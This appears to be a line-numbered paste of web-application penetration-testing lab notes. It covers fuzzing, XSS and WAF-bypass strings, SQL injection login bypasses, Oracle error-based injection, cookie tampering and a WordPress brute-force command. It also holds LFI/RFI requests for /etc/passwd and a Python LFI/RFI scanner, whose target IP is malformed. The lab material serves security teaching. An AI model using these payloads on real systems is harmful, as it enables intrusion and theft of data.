3226 | ||
3227 | xss_upload.txt (Upload Bulk Order) | |
3228 | <script>alert(123);</script> | |
3229 | ||
3230 | ||
3231 | ||
3232 | ||
3233 | ############################### | |
3234 | # How much fuzzing is enough? # | |
3235 | ############################### | |
3236 | There really is no exact science for determining the correct amount of fuzzing per parameter to do before moving on to something else. | |
3237 | ||
3238 | Here are the steps that I follow when I'm testing (my mental decision tree) to figure out how much fuzzing to do. | |
3239 | ||
3240 | ||
3241 | Step 1: Ask yourself the 3 questions per page of the site. | |
3242 | ||
3243 | Step 2: If the answer is yes, then go down that particular attack path with a few fuzz strings (I usually do 10-20 fuzz strings per parameter) | |
3244 | ||
3245 | Step 3: When you load your fuzz strings - use the following decision tree | |
3246 | ||
3247 | - Are the fuzz strings causing a default error message (example 404)? | |
3248 | - If this is the case then it is most likely NOT vulnerable | |
3249 | ||
3250 | - Are the fuzz strings causing a WAF or LB custom error message? | |
3251 | - If this is the case then you need to find an encoding method to bypass | |
3252 | ||
3253 | ||
3254 | - Are the fuzz strings causing an error message that discloses the backend type? | |
3255 | - If yes, then identify DB type and find correct syntax to successfully exploit | |
3256 | - Some example strings that I use are: | |
3257 | ' | |
3258 | " | |
3259 | () <----- Take the parameter value and put it in parenthesis | |
3260 | (5-1) <----- See if you can perform an arithmetic function | |
3261 | ||
3262 | ||
3263 | - Are the fuzz strings rendering executable code? | |
3264 | - If yes, then report XSS/CSRF/Response Splitting/Request Smuggling/etc | |
3265 | - Some example strings that I use are: | |
3266 | <b>hello</b> | |
3267 | <u>hello</u> | |
3268 | <script>alert(123);</script> | |
3269 | <script>alert(xss);</script> | |
3270 | <script>alert('xss');</script> | |
3271 | <script>alert("xss");</script> | |
3272 | ||
3273 | ||
3274 | ||
3275 | ||
3276 | ||
3277 | ||
3278 | ############################ | |
3279 | # Trading Web App with WAF # | |
3280 | # http://54.213.131.105 # | |
3281 | ############################ | |
3282 | ||
3283 | ||
3284 | Try the following in the search box: | |
3285 | <script>alert(123);</script> | |
3286 | <script>alert(123);</script | |
3287 | <script>alert(123) | |
3288 | <script>alert | |
3289 | <script> | |
3290 | <script | |
3291 | <scrip | |
3292 | <scri | |
3293 | <scr | |
3294 | <sc | |
3295 | <s | |
3296 | <p | |
3297 | < | |
3298 | < s | |
3299 | Joe'+OR+1=1;-- | |
3300 | ||
3301 | ||
3302 | Open a new tab in firefox and try this: | |
3303 | http://54.213.131.105/Searchresult.aspx?%u003cscript>prompt(123)%u003c/script>=ScriptName | |
3304 | ||
3305 | ||
3306 | xss_upload.txt (Upload Bulk Order) | |
3307 | <script>alert(123);</script> | |
3308 | ||
3309 | ||
3310 | Login Box: | |
3311 | ||
3312 | ' or 1=1 or ''=' | |
3313 | anything | |
3314 | ||
3315 | ||
3316 | ||
3317 | Tamper Data: (notice 2 session IDs) | |
3318 | ||
3319 | AcmeTrading=a4b796687b846dd4a34931d708c62b49; SessionID is md5 | |
3320 | IsAdmin=yes; | |
3321 | ASP.NET_SessionId=d10dlsvaq5uj1g550sotcg45 | |
3322 | ||
3323 | ||
3324 | ||
3325 | Profile - Detail (tamper data) | |
3326 | Disposition: form-data; name="ctl00$contentMiddle$HiddenField1"\r\n\r\njoe\r\n | |
3327 | joe|set | |
3328 | ||
3329 | ||
3330 | ||
3331 | ||
3332 | ||
3333 | ||
3334 | ||
3335 | ########################################################### | |
3336 | # Attacking an Oracle/JSP based WebApp with SQL Injection # | |
3337 | ########################################################### | |
3338 | ||
3339 | ||
3340 | ||
3341 | ||
3342 | ||
3343 | http://54.69.156.253:8081/bookcompany/ | |
3344 | ||
3345 | ||
3346 | user: a' OR 'a'='a | |
3347 | pass: a' OR 'a'='a | |
3348 | ||
3349 | ||
3350 | ||
3351 | ||
3352 | ||
3353 | ||
3354 | ||
3355 | http://54.69.156.253:8081/bookcompany/author.jsp?id=111 | |
3356 | ||
3357 | ||
3358 | [ Search by Username ] Joe' OR 'a'='a | |
3359 | ||
3360 | ||
3361 | ||
3362 | ||
3363 | ||
3364 | ||
3365 | ||
3366 | ||
3367 | ||
3368 | ||
3369 | ||
3370 | ||
3371 | http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1 | |
3372 | ||
3373 | ||
3374 | ||
3375 | http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' OR '1'='1 | |
3376 | ||
3377 | ||
3378 | ||
3379 | ||
3380 | ||
3381 | ||
3382 | ||
3383 | ||
3384 | ||
3385 | ||
3386 | ||
3387 | ||
3388 | ||
3389 | ||
3390 | ||
3391 | http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))-- | |
3392 | ||
3393 | ||
3394 | Host is running: | |
3395 | ||
3396 | ||
3397 | ||
3398 | ||
3399 | ||
3400 | http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' or 1=utl_inaddr.get_host_address((SELECT user FROM dual))-- | |
3401 | ||
3402 | User is: | |
3403 | ||
3404 | ||
3405 | ||
3406 | ||
3407 | ||
3408 | http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' or 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name))-- | |
3409 | ||
3410 | Current database is: | |
3411 | RAW Paste Data | |
3412 | ||
3413 | ||
3414 | ||
3415 | ||
3416 | ###################### | |
3417 | # Lesson 27: Web App # | |
3418 | ###################### | |
3419 | vi wpbruteforcer.py | |
3420 | ||
3421 | ||
3422 | python wpbruteforcer.py -t strategicsec.com -u j0e -w list.txt | |
3423 | ||
3424 | ||
3425 | ||
3426 | - Here is an example of an LFI | |
3427 | - Open this page in Firefox: | |
3428 | http://54.172.112.249/showfile.php?filename=contactus.txt | |
3429 | ||
3430 | - Notice the page name (showfile.php) and the parameter name (filename) and the filename (contactus.txt) | |
3431 | - Here you see a direct reference to a file on the local filesystem of the victim machine. | |
3432 | - You can attack this by doing the following: | |
3433 | http://54.172.112.249/showfile.php?filename=/etc/passwd | |
3434 | ||
3435 | - This is an example of a Local File Include (LFI), to change this attack into a Remote File Include (RFI) you need some content from | |
3436 | - somewhere else on the Internet. Here is an example of a text file on the web: | |
3437 | http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt | |
3438 | ||
3439 | - Now we can attack the target via RFI like this: | |
3440 | http://54.172.112.249/showfile.php?filename=http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt | |
3441 | ||
3442 | ||
3443 | - Now let's see if we can write some code to do this for us: | |
3444 | ||
3445 | vi LFI-RFI.py | |
3446 | ||
3447 | ||
3448 | ||
3449 | #!/usr/bin/env python | |
3450 | print "\n### PHP LFI/RFI Detector ###" | |
3451 | print "### Sean Arries 09/18/09 ###\n" | |
3452 | ||
3453 | import urllib2,re,sys | |
3454 | ||
3455 | ||
3456 | TARGET = "http://554.172.112.249/showfile.php?filename=contactus.txt" | |
3457 | RFIVULN = "http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt?" | |
3458 | TravLimit = 12 | |
3459 | ||
3460 | print "==> Testing for LFI vulns.." | |
3461 | TARGET = TARGET.split("=")[0]+"=" ## URL MANUPLIATION | |
3462 | for x in xrange(1,TravLimit): ## ITERATE THROUGH THE LOOP | |
3463 | TARGET += "../" | |
3464 | try: | |
3465 | source = urllib2.urlopen((TARGET+"etc/passwd")).read() ## WEB REQUEST | |
3466 | except urllib2.URLError, e: | |
3467 | print "$$$ We had an Error:",e | |
3468 | sys.exit(0) | |
3469 | if re.search("root:x:0:0:",source): ## SEARCH FOR TEXT IN SOURCE | |
3470 | print "!! ==> LFI Found:",TARGET+"etc/passwd" | |
3471 | break ## BREAK LOOP WHEN VULN FOUND | |
3472 | ||
3473 | print "\n==> Testing for RFI vulns.." | |
3474 | TARGET = TARGET.split("=")[0]+"="+RFIVULN ## URL MANUPLIATION | |
3475 | try: | |
3476 | source = urllib2.urlopen(TARGET).read() ## WEB REQUEST | |
3477 | except urllib2.URLError, e: | |
3478 | print "$$$ We had an Error:",e | |
3479 | sys.exit(0) | |
3480 | if re.search("j0e",source): ## SEARCH FOR TEXT IN SOURCE | |
3481 | print "!! => RFI Found:",TARGET | |
3482 | ||
3483 | ||
3484 | print "\nScan Complete\n" ## DONE |